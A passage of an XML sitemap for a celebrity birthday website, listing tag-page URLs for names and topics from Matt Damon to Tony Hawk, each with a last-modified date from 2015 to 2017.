<lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-age/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-bio/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-birthday/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-facts/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-kids/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-movies/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon-wife/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mcgraw/</loc>\n <lastmod>2015-10-14T14:36:15+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mean-girls-celebrities/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/melissa-mccarthy/</loc>\n <lastmod>2015-10-14T14:26:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mens-wear/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mery-streep-bio/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/meryl-streep/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/meryl-streep-family/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mexican-musician/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/miami-hurricanes-football-team/</loc>\n <lastmod>2015-10-14T15:56:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/michael-emerson/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mike-tyson/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mike-tyson-mysteries/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mila-kunis/</loc>\n <lastmod>2015-10-14T20:39:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/million-dollar-baby/</loc>\n <lastmod>2015-10-14T16:28:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/miranda-cosgrove/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/miranda-cosgrove-career/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mission-imposible-cast/</loc>\n <lastmod>2015-10-14T18:21:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/model/</loc>\n <lastmod>2016-11-28T23:10:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/modelactress/</loc>\n <lastmod>2015-10-14T14:10:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/modeling/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/monica-geller/</loc>\n <lastmod>2015-10-14T17:51:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/morgan-freeman/</loc>\n <lastmod>2015-10-14T16:28:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/morgan-freeman-profession/</loc>\n <lastmod>2015-10-14T16:28:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/most-famous-action-film-star/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/most-famous-comedian/</loc>\n <lastmod>2015-10-14T18:44:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/most-famous-drummer/</loc>\n <lastmod>2015-10-14T18:23:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/most-famous-skateboarder/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movie-actor/</loc>\n <lastmod>2017-06-20T16:09:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movie-actress/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movie-comedian/</loc>\n <lastmod>2015-10-14T18:31:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movie-director/</loc>\n <lastmod>2015-10-14T14:30:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movie-star/</loc>\n <lastmod>2017-06-20T16:08:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movies/</loc>\n <lastmod>2017-06-20T16:09:35+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/movies-celebrities/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mr-joshua/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mr-t/</loc>\n <lastmod>2015-10-14T16:22:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/music/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/music-artist-with-criminal-reccord/</loc>\n <lastmod>2015-10-14T18:22:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nancy-shevell/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nasa/</loc>\n <lastmod>2016-11-28T22:24:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nasty/</loc>\n <lastmod>2015-10-14T18:01:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/national-educational-film-festival/</loc>\n <lastmod>2015-10-14T16:32:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/national-network-to-end-domestic-violence/</loc>\n <lastmod>2015-10-09T19:11:54+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nba/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nba-player/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nevada-brothel/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/new-york-college-of-music/</loc>\n <lastmod>2015-10-14T17:57:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/new-york-rapper/</loc>\n <lastmod>2015-10-14T18:22:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nfl/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nfl-draft/</loc>\n <lastmod>2015-10-14T15:56:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/nodoubt/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/non-violence/</loc>\n <lastmod>2015-10-08T17:52:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/october-15th/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/october-16/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/october-18/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/october-celebrities/</loc>\n <lastmod>2015-10-14T14:16:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ohio-celebrities/</loc>\n <lastmod>2015-10-09T19:14:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/opera/</loc>\n <lastmod>2015-10-09T16:41:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/opera-singer/</loc>\n <lastmod>2015-10-09T16:41:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/owen-wilson/</loc>\n <lastmod>2016-11-28T16:11:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso-biography/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso-birthday/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso-facts/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso-life/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pablo-picasso-wife/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pamela-anderson/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/party-hoster-at-bloomington-national-guard/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-mccartney/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-age/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-and-art-garfunkel/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-bio/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-birthday/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-facts/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-songs/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paul-simon-wife/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/paula-abdul/</loc>\n <lastmod>2015-10-14T18:01:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/person-of-interest/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pink/</loc>\n <lastmod>2015-10-09T16:52:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/politicians-born-in-october/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/politics/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pop/</loc>\n <lastmod>2015-10-09T16:56:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pop-music/</loc>\n <lastmod>2015-10-14T14:58:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pop-singer/</loc>\n <lastmod>2015-10-09T16:52:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/pop-singer-chris-brown/</loc>\n <lastmod>2015-10-14T14:58:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/president-dwight-eisenhower/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/presidents-birthdays/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/presidents-born-in-october/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/prince-andrew/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/prince-charles/</loc>\n <lastmod>2016-11-28T19:10:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/princess-sarah-ferguson/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/producer/</loc>\n <lastmod>2016-11-28T16:44:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/professional-basketball-player/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/professional-soccer-player/</loc>\n <lastmod>2015-10-14T16:22:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/professional-wrestler/</loc>\n <lastmod>2015-10-09T19:14:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/quinn-fabray/</loc>\n <lastmod>2015-10-14T14:34:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rb/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rr/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/racism/</loc>\n <lastmod>2016-11-28T19:13:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/radio-disney/</loc>\n <lastmod>2015-10-13T19:52:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/randall-matthew-jackson/</loc>\n <lastmod>2015-10-14T18:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/randy-jackson/</loc>\n <lastmod>2015-10-14T18:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/randy-travis/</loc>\n <lastmod>2015-10-14T14:57:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/randy-travis-history/</loc>\n <lastmod>2015-10-14T14:57:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rap/</loc>\n <lastmod>2015-10-09T16:47:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rap-grammy-award/</loc>\n <lastmod>2015-10-14T18:22:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rappers-born-in-october/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ray-lewis/</loc>\n <lastmod>2015-10-14T15:56:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/reading-berkshire-famous-people/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/reality-shows/</loc>\n <lastmod>2016-11-28T23:10:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/redhead-celebrities/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/relationships/</loc>\n <lastmod>2016-11-28T22:56:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/restaurants/</loc>\n <lastmod>2016-11-28T22:30:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rich-people/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/richest-actor/</loc>\n <lastmod>2015-10-09T19:21:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ricky-gervais/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/robert-englund/</loc>\n <lastmod>2015-10-14T17:10:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/robert-kennedy/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/robert-pattinson/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rock-star-legend/</loc>\n <lastmod>2016-11-28T15:17:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rock-stars/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rocky-iii/</loc>\n <lastmod>2015-10-14T16:22:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rupert-grint/</loc>\n <lastmod>2017-06-20T16:09:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/russell-simmons/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/russell-simmons-age/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/russell-simmons-birthday/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/russell-simmons-facts/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/russias-president/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ryan-phillippe/</loc>\n <lastmod>2015-10-09T16:51:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/rythm-and-blues-artist/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sabrina-ann-lynn-carpenter/</loc>\n <lastmod>2015-10-13T19:52:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sabrina-carpenter/</loc>\n <lastmod>2015-10-13T19:52:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/santana-g/</loc>\n <lastmod>2015-10-14T16:23:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/santana-garrett/</loc>\n <lastmod>2015-10-14T16:23:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sarah-ferguson/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sarah-ferguson-age/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sarah-ferguson-birthday/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sarah-ferguson-facts/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/saturday-night-live/</loc>\n <lastmod>2016-11-28T19:30:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/saturday-night-live-comedian/</loc>\n <lastmod>2015-10-14T18:31:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/scorpio-celebs/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sean-penn/</loc>\n <lastmod>2015-10-14T20:39:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/second/</loc>\n <lastmod>2015-10-09T17:07:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/seinfeld/</loc>\n <lastmod>2015-10-14T14:34:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/september/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sexiest-actress/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sexiest-movie-actor/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/shaggys-voice/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/simon-and-garfunkel/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/singer/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/singer-and-actress-celebrity/</loc>\n <lastmod>2015-10-09T19:21:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/skateboarding-contests/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/skylar-astin/</loc>\n <lastmod>2015-10-09T16:41:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/smack-down-stars/</loc>\n <lastmod>2015-10-09T19:14:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-age/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-albums/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-biography/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-birthday/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-rapper/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-dogg-songs/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/snoop-lion/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/sonny-and-cher/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/soul/</loc>\n <lastmod>2015-10-09T16:47:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/soul-music/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/spanish-singer/</loc>\n <lastmod>2015-10-14T15:50:31+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/spurs/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/stand-up/</loc>\n <lastmod>2016-11-28T19:30:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/stand-up-comedian/</loc>\n <lastmod>2015-10-14T18:44:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/star-borned-in-bronx/</loc>\n <lastmod>2015-10-09T19:21:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/star-trek/</loc>\n <lastmod>2015-10-14T16:30:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/super-bowl/</loc>\n <lastmod>2015-10-14T15:56:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/talk-show/</loc>\n <lastmod>2016-11-28T22:46:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ted-prize-winner/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/television/</loc>\n <lastmod>2016-11-28T16:56:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/television-celebrity/</loc>\n <lastmod>2015-10-09T18:38:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/television-man/</loc>\n <lastmod>2015-10-14T17:46:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/terminator/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/texas-famous-actors/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-a-team/</loc>\n <lastmod>2015-10-14T16:22:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-beatles/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-hangover-cast/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-hobbit-cast/</loc>\n <lastmod>2015-10-14T16:23:53+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-rock/</loc>\n <lastmod>2015-10-14T14:57:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-sopranos/</loc>\n <lastmod>2015-10-09T16:44:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/the-tonight-show/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/third/</loc>\n <lastmod>2015-10-09T17:07:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tim-burton/</loc>\n <lastmod>2015-10-14T14:30:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tim-hardaway/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tim-mcgraw/</loc>\n <lastmod>2015-10-14T14:36:15+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tina-turner/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/toby-keith-last-album/</loc>\n <lastmod>2015-10-14T18:24:12+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tom-sawyer/</loc>\n <lastmod>2016-11-23T03:17:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tom-sawyer-and-adventures-of-huckleberry-finn/</loc>\n <lastmod>2016-11-23T03:17:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tommy-lee-jones/</loc>\n <lastmod>2015-10-09T16:46:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tony-hawk/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tony-hawk-foundation/</loc>\n <lastmod>2015-10-14T15:51:03+00:00</lastmod>\n </url>\n <url>\n 